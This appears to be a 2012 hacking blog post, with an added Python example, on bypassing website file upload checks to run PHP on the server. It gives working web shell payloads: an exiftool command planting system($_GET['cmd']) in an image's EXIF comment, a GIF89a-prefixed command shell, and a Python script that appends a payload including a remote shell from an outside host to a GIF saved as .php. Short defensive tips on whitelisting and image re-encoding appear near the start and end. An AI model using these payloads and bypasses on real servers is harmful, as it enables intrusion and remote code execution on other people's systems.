File upload bypass
File upload mechanisms are very common on websites, but their validation is often poor. This lets an attacker upload a malicious file to the web server, which may then be executed by the server itself (server-side code such as PHP) or served to other users. The same applies to authenticated areas of a site (e.g. installing WordPress plugins), so an upload form behind a login is not automatically safe.
Developers may blacklist specific file extensions and reject uploads whose extension is considered dangerous. This can be bypassed with an alternate extension the blacklist missed, or even an unrelated one that the server still hands to the interpreter. For example, it is often possible to upload and execute a .php file simply by renaming it to one of the following (extensions a server may still map to each language):
| Language | Alternate extensions |
|---|---|
| PHP | .phtml, .php, .php3, .php4, .php5, .inc |
| Perl | .pl, .pm, .cgi, .lib |
| JSP | .jsp, .jspx, .jsw, .jsv, .jspf |
| ColdFusion | .cfm, .cfml, .cfc, .dbm |
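The blacklist described above next to a whitelist, as an added Python example (this is not code from the original page; the set names, the image-extension list and the type mapping in stored_filename are assumptions). It shows the two things that go wrong: a blacklist that only knows .php, and a check that, like os.path.splitext, only ever sees the last extension, so shell.php.jpg is accepted. Whether such a name actually executes depends on the web server: Apache's mod_mime with AddHandler treats every dot-suffix as meaningful, which is why double extensions matter.

```python
import os
import secrets

# Added example, not code from the original page. The executable-extension
# set is the table above; the naive blacklist and image list are illustrative.
NAIVE_BLACKLIST = {".php"}
EXECUTABLE = {".php", ".phtml", ".php3", ".php4", ".php5", ".inc",
              ".pl", ".pm", ".cgi", ".lib",
              ".jsp", ".jspx", ".jsw", ".jsv", ".jspf",
              ".cfm", ".cfml", ".cfc", ".dbm"}
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def blacklist_allows(filename):
    """Typical vulnerable check: compare only the final extension to a blacklist.
    shell.phtml passes; so would anything else the blacklist forgot."""
    return os.path.splitext(filename)[1].lower() not in NAIVE_BLACKLIST


def whitelist_allows(filename):
    """Better, but splitext() only returns the last extension, so shell.php.jpg
    is accepted. Whether it runs as PHP is then up to the server's handler
    configuration, not the upload form."""
    return os.path.splitext(filename)[1].lower() in IMAGE_EXTENSIONS


def inner_executable_extensions(filename):
    """Every executable extension anywhere in the basename, not just the last."""
    parts = os.path.basename(filename).lower().split(".")[1:]
    return ["." + p for p in parts if "." + p in EXECUTABLE]


def stored_filename(detected_type):
    """Hardened: discard the client-supplied name entirely and derive the
    extension from the image type detected server-side (assumed mapping)."""
    ext = {"jpeg": ".jpg", "png": ".png", "gif": ".gif"}[detected_type]
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in ("shell.php", "shell.PHP", "shell.phtml", "shell.php.jpg", "photo.jpg"):
        print(name, blacklist_allows(name), whitelist_allows(name),
              inner_executable_extensions(name))
    print(stored_filename("gif"))
```

Running it prints, per name, whether the blacklist and the whitelist accept it and which executable extensions hide inside it; the stored name at the end is random and carries only the extension the server chose.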
Checking the MIME type (the Content-Type of the uploaded part) is another common validation. That value is supplied by the client, so it can be bypassed by intercepting the POST request in a proxy on its way to the server and changing the Content-Type to one the server accepts (e.g. image/jpeg) while leaving the PHP content untouched.
Normal php MIME type:
For uploads that validate the file with PHP's getimagesize() (which parses the image header for the type and dimensions but does not inspect the rest of the file), it may be possible to execute PHP code by inserting it into the Comment field of the image's EXIF metadata and then saving the result under a name the server will still pass to the PHP handler. You can do this with GIMP or exiftool:
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' file.jpg
mv file.jpg file.php.jpg
I’m not sure why some tutorials have the php extension first while others have it second. Try both.
GIF89a is the GIF file signature (magic bytes). If uploaded content is checked by its signature rather than its extension (getimagesize(), finfo and file all do this), the check can sometimes be fooled by putting the signature at the top of the PHP file. getimagesize() then reads the bytes that follow as the width and height, so a minimum-size check sees large garbage values rather than a rejection:
GIF89a
<?php system($_GET['cmd']); /* PHP code goes here */ ?>
In my last two posts about Malicious PHP Code in the Form of an Image, I only talked about uploading PHP as image files and how websites can be vulnerable to hacking. However, in this post I'm going to talk about how to inject PHP code into a valid image file.
Because malicious PHP code can be uploaded as a JPG or GIF file through insecure upload forms, many upload forms do not rely on the extension alone: they check the contents of the file, or both the contents and the extension. In those situations a plain PHP file cannot be uploaded as an image file.
Let's say there is an upload form that doesn't check the file extension but does check the contents of the file. That is more secure than checking only the extension. An attacker can overcome it by injecting malicious PHP code into a valid image file and uploading it with a .php extension, which is what I'm going to describe now.
There are a few ways to add PHP code to an image file: add it to the EXIF metadata with an EXIF editor, use software like GIMP to put it in the image's comment field, or write it in with a hex editor.
But there is a simpler way. First make a small plain white GIF file; a JPG will do too. Make sure it is white: I've used other images, but sometimes they give errors in PHP because of the characters in the image data.
Make a small PHP file. Keep the code short, because a long payload appended to a valid image is more likely to produce a PHP error as well; this will do:
<?php include ("http://example.com/shell.php"); ?>
Save this as a PHP file. Note that include() of an http:// URL only works if the server's php.ini has allow_url_include enabled (it is off by default since PHP 5.2); if it is not, a self-contained payload such as the system($_GET['cmd']) one-liner above is needed.
Then make this small piece of Python code:
# read the valid GIF, append the PHP payload, write the result out as a .php file
lavender = open('msgif.gif', 'rb').read()
lavender += open('test.php', 'rb').read()
open('newphp.php', 'wb').write(lavender)
Run the Python script: the result is a valid image file with the PHP code at the end, saved with a .php extension.
Upload this to a form that checks the content of the file but not the extension. Such forms usually check the file header (sometimes also the width and height of the image) and skip the extension check, on the reasoning that checking content is better than checking the extension, so the file is accepted as a PHP file. Requesting the file's URL then runs it through PHP: the GIF or JPG bytes before the opening tag are simply sent to the browser as output, and the PHP code after them executes on the server, so the remote shell it includes is fetched and executed there.
For upload forms that check both the extension and the content of the file, the same malicious image can be renamed to .gif or .jpg and uploaded, and it can then be executed just like a PHP file with an image extension, as I talked about in my previous two posts (this again depends on the server mapping that name to the PHP handler).
Some sites check the image dimensions with PHP's getimagesize(), rejecting images that are too small. getimagesize() reads the dimensions from the image header and does not otherwise inspect the file, so a larger white image carrying the same payload will most probably be accepted.
A form can defend against this by not storing the uploaded bytes as-is but re-creating the image on the server with PHP's image functions (GD's imagecreatefrom*() and imagegif()/imagejpeg()), which re-encodes the pixels and drops both metadata and any data after the image, and by stripping metadata before storing the file. Re-encoding is the reliable fix; stripping metadata alone leaves an appended payload in place. The upload only becomes code execution if the stored file is served through the PHP handler, so the stored name should not keep a client-controlled extension either.
I think this wraps up injecting malicious PHP code into an image; I'll write another post if I have anything more to add.
Posted 18th July 2012 by Unknown
Labels: Hacking Infosec Malicious PHP In Images Malware PHP